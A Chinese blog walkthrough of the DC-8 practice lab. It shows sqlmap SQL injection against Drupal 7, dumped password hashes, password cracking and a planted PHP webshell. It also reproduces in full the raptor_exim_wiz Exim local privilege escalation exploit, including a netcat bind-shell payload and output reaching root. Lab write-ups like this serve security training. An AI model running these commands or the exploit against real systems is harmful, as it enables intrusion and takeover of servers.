DC-8靶场
|
13
|
练习

853 字
|
13 分钟
阅读量: 13

DC-8靶场

信息收集

  • nmap扫描,发现IP为192.168.137.139,开放端口22和80

    image-20250419101654908

  • 访问80端口,并扫描CMS为drupal7

    image-20250419101959486

  • http://192.168.137.139/?nid=1发现访问页面时传递有参数nid,猜测可能存在SQL注入漏洞。

测试SQL注入

  • 发现order by 1时正常,order by 2出错,推测数据库中可能只有一列

    image-20250419103222936

  • 但是即便查询成功也没有回显

    image-20250419103359111

  • 使用报错注入测试

    • 测试,爆数据库版本

    image-20250419110836938

    • 爆数据库名

    image-20250419111009779

    • 直接使用sqlmap爆d7db数据库中的表名,发现有88个表,这里只显示以下可能有用的
    python .\sqlmap.py -u http://192.168.137.139/?nid=1 --random-agent -p nid --technique E --dbms mariadb -D d7db --tables --threads 10

Database: d7db
[88 tables]
+-----------------------------+
| block                       |
| cache                       |
| history                     |
| role                        |
| system                      |
| actions                     |
| authmap                     |
| batch                       |
| users                       |
| users_roles                 |
| variable                    |
| watchdog                    |
+-----------------------------+
    • 爆users表的字段名
    python .\sqlmap.py -u http://192.168.137.139/?nid=1 --random-agent -p nid --technique E --dbms mariadb -D d7db -T users --columns --threads 10

Database: d7db
Table: users
[16 columns]
+------------------+------------------+
| Column           | Type             |
+------------------+------------------+
| data             | longblob         |
| language         | varchar(12)      |
| name             | varchar(60)      |
| status           | tinyint(4)       |
| access           | int(11)          |
| created          | int(11)          |
| init             | varchar(254)     |
| login            | int(11)          |
| mail             | varchar(254)     |
| pass             | varchar(128)     |
| picture          | int(11)          |
| signature        | varchar(255)     |
| signature_format | varchar(255)     |
| theme            | varchar(255)     |
| timezone         | varchar(32)      |
| uid              | int(10) unsigned |
+------------------+------------------+
    • 继续爆users表的uid/name/status/access/pass字段
    python .\sqlmap.py -u http://192.168.137.139/?nid=1 --random-agent -p nid --technique E --dbms mariadb -D d7db -T users -C uid,name,status,access,pass --dump --threads 10

Database: d7db
Table: users
[3 entries]
+-----+---------+----------+------------+---------------------------------------------------------+
| uid | name    | status   | access     | pass                                                    |
+-----+---------+----------+------------+---------------------------------------------------------+
| 0   |  | 0        | 0          |                                                  |
| 1   | admin   | 1        | 1567766818 | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| 2   | john    | 1        | 1567498512 | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+-----+---------+----------+------------+---------------------------------------------------------+

  • 得到两个用户的账号和密码对应的摘要值,使用john工具破解

    image-20250419114229417

  • 得到john用户的密码turtle

getshell

  • 登录网站后台,修改网页内容,并将其修改为php格式

    image-20250419114916587

  • 测试木马是否成功,结果成功

    image-20250419115201370

  • 尝试antsword连接不成功,加上cookie也不行。那就直接反弹shell

    image-20250419120754620

提权

  • sudo -l 需要密码。先查看suid权限文件

    image-20250419120953898

  • 这些具有suid权限的命令都挺常见的,exim4在dc-7中也有suid权限,这是一个用来配置邮件的命令,网上查一下看它能不能开启命令模式,发现没有。但是存在cve漏洞。

    image-20250419122255662

  • 复制提取脚本Exim 4.87 - 4.91 - Local Privilege Escalation - Linux local Exploit,放在自己的服务器上,然后用dc-8下载。注意,/var/www目录www-data用户没有写权限,所以先cd到/tmp目录再wget

    image-20250419123523803

  • 赋予755权限,执行该脚本

    image-20250419123722008

  • 执行报错,询问ai说是该文件中的\r是windows风格的换行符,Linux解析不了,所以要把文件中的\r换掉。

    www-data@dc-8:/tmp$ sed -i 's/\r$//' root.sh
sed -i 's/\r$//' root.sh
www-data@dc-8:/tmp$ . root.sh
. root.sh

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi 

Preparing setuid shell helper...
Problems compiling setuid shell helper, check your gcc.
Falling back to the /bin/sh method.

Delivering setuid payload...
220 dc-8 ESMTP Exim 4.89 Sat, 19 Apr 2025 14:43:49 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1u603R-0000IK-7Y
221 dc-8 closing connection

Waiting 5 seconds...
-rwxr-xr-x 1 www-data www-data 117208 Apr 19 14:43 /tmp/pwned
$ whoami
whoami
www-data

  • 发现直接使用. root.sh执行没有提权成功。阅读脚本,发现默认方法为setuid,这种方法需要用到gcc,而如果gcc执行出错则会复制/bin/sh执行,也就是原来的权限。所以没有提权成功应该是dc-8的gcc不可用,而使用netcat则没有问题。

    METHOD="setuid" # default method
PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'

# usage instructions
function usage()
{
echo "$0 [-m METHOD]"
echo
echo "-m setuid : use the setuid payload (default)"
echo "-m netcat : use the netcat payload"
echo
exit 1
}

# payload delivery
function exploit()
{
# connect to localhost:25
exec 3<>/dev/tcp/localhost/25

# deliver the payload
read -u 3 && echo $REPLY
echo "helo localhost" >&3
read -u 3 && echo $REPLY
echo "mail from:<>" >&3
read -u 3 && echo $REPLY
echo "rcpt to:<$PAYLOAD>" >&3
read -u 3 && echo $REPLY
echo "data" >&3
read -u 3 && echo $REPLY
for i in {1..31}
do
    echo "Received: $i" >&3
done
echo "." >&3
read -u 3 && echo $REPLY
echo "quit" >&3
read -u 3 && echo $REPLY
}

# print banner
echo
echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
echo 'Copyright (c) 2019 Marco Ivaldi '
echo

# parse command line
while [ ! -z "$1" ]; do
case $1 in
    -m) shift; METHOD="$1"; shift;;
    * ) usage
    ;;
esac
done
if [ -z $METHOD ]; then
usage
fi

# setuid method
if [ $METHOD = "setuid" ]; then

# prepare a setuid shell helper to circumvent bash checks
echo "Preparing setuid shell helper..."
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c
gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null
if [ $? -ne 0 ]; then
    echo "Problems compiling setuid shell helper, check your gcc."
    echo "Falling back to the /bin/sh method."
    cp /bin/sh /tmp/pwned
fi
echo

# select and deliver the payload
echo "Delivering $METHOD payload..."
PAYLOAD=$PAYLOAD_SETUID
exploit
echo

# wait for the magic to happen and spawn our shell
echo "Waiting 5 seconds..."
sleep 5
ls -l /tmp/pwned
/tmp/pwned

# netcat method
elif [ $METHOD = "netcat" ]; then

# select and deliver the payload
echo "Delivering $METHOD payload..."
PAYLOAD=$PAYLOAD_NETCAT
exploit
echo

# wait for the magic to happen and spawn our shell
echo "Waiting 5 seconds..."
sleep 5
nc -v 127.0.0.1 31337

# print help
else
usage
fi

  • netcat方式提权,成功

    www-data@dc-8:/tmp$ . root.sh -m netcat
. root.sh -m netcat

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi 

Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Sat, 19 Apr 2025 14:48:15 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1u607j-0000Iz-Vm
221 dc-8 closing connection

Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
whoami
whoami
root

flag

  • cat /root/flag.txt

image-20250419125920476

靶场
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

																				
					
									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
DC-9靶场

							
							

							
DC-7靶场

							
							

							
DC-6靶场

							
							

							
DC-5靶场

							
							

							
DC-4靶场

							
							

							
DC-3靶场

							
							

							
DC-2靶场

							
							

							
DC-1靶场

							
							

							
2024长城杯铁人三项Misc